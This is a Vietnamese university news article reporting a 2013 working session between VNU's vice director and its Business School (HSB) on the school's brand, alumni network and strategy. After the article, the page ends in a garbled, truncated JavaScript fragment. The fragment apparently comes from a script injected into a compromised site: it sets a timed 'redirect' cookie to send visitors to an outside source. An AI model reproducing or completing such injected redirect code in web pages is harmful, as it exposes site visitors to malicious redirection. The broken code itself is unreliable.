VNU – HSB: Cần phát huy mạnh mẽ bản sắc riêng

about us

Ngày 11/4/2013, Đoàn ĐHQGHN do đồng chí Nguyễn Kim Sơn – Phó Giám đốc ĐHQGHN – dẫn đầu đã có buổi làm việc với Khoa Quản trị Kinh doanh (HSB), ĐHQGHN.

Ngày 11/4/2013, Đoàn ĐHQGHN do đồng chí Nguyễn Kim Sơn – Phó Giám đốc ĐHQGHN – dẫn đầu đã có buổi làm việc với Khoa Quản trị Kinh doanh (HSB), ĐHQGHN.

Tại buổi làm việc, ông Hoàng Đình Phi – Phó Chủ nhiệm Khoa HSB – cho biết, sau gần 18 năm phát triển, đến nay HSB đã trở thành một thương hiệu mạnh tại Việt Nam, là một trong số ít đơn vị thuộc top đầu chuyên nghiên cứu và đào tạo về quản trị kinh doanh và cũng là cơ sở đầu tiên của Việt Nam tổ chức thành công chương trình đào tạo Thạc sĩ quản trị kinh doanh giảng dạy bằng tiếng Anh. Với sứ mệnh đào tạo các nhà lãnh đạo, nhà quản trị và điều hành chuyên nghiệp (leaders, executives, professional managers), trong định hướng chiến lược 10 năm tới, HSB sẽ tập trung phát triển mạnh để có khả năng hợp tác và cạnh tranh với các trường cùng ngành trong khu vực và phấn đấu đáp ứng tốt các chuẩn mực quốc tế trong nghiên cứu và giảng dạy. Bên cạnh đó, HSB tiếp tục đẩy mạnh hợp tác với các nhà khoa học để thiết kế và triển khai các chương trình đào tạo Thạc sỹ mới, mang tính liên ngành cao, chất lượng cao, nhanh chóng đạt chuẩn quốc tế, đảm bảo học viên tốt nghiệp có thể làm việc tốt trong môi trường cạnh tranh và hội nhập quốc tế.

Phát biểu kết luận tại buổi làm việc, PGĐ Nguyễn Kim Sơn khẳng định, trong thời gian qua HSB đã tạo dựng được thương hiệu bằng chính kết quả đào tạo của mình. Nhưng trong bối cảnh hiện nay, HSB cần tiếp tục đổi mới và sáng tạo để phát triển bền vững trên nền tảng sử dụng hiệu quả “di sản” thương hiệu và mạng lưới hơn 10.000 cựu sinh viên HSB – lực lượng có vai trò chủ chốt trong hệ thống kinh doanh của Việt Nam hiện nay. Phó Giám đốc cho rằng HSB phải hệ thống hoá, kết nối, xác lập lại mạng lưới cựu sinh viên, các đối tác doanh nghiệp và những mối quan hệ hợp tác với nước ngoài.

Phó Giám đốc yêu cầu, HSB cần xác định lại định hướng, tư duy chiến lược trong tổng thể chiến lược phát triển của ĐHQGHN, đặc biệt trong công tác đào tạo cần xác định một bản sắc riêng, trên cơ sở đó xây dựng đội ngũ giảng viên kiêm các nhà khoa học đầu ngành, các nhóm nghiên cứu mạnh. Điều chỉnh, hoàn thiện các chương trình, đề án đào tạo và nghiên cứu khoa học. Phó Giám đốc đề nghị HSB cần phối hợp chặt chẽ với các ban chức năng, đơn vị thành viên ĐHQGHN để tăng cường hiệu quả trong công tác quản lí, đào tạo, tận dụng mọi nguồn lực, thế mạnh của ĐHQGHN. 

 7

8

 

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’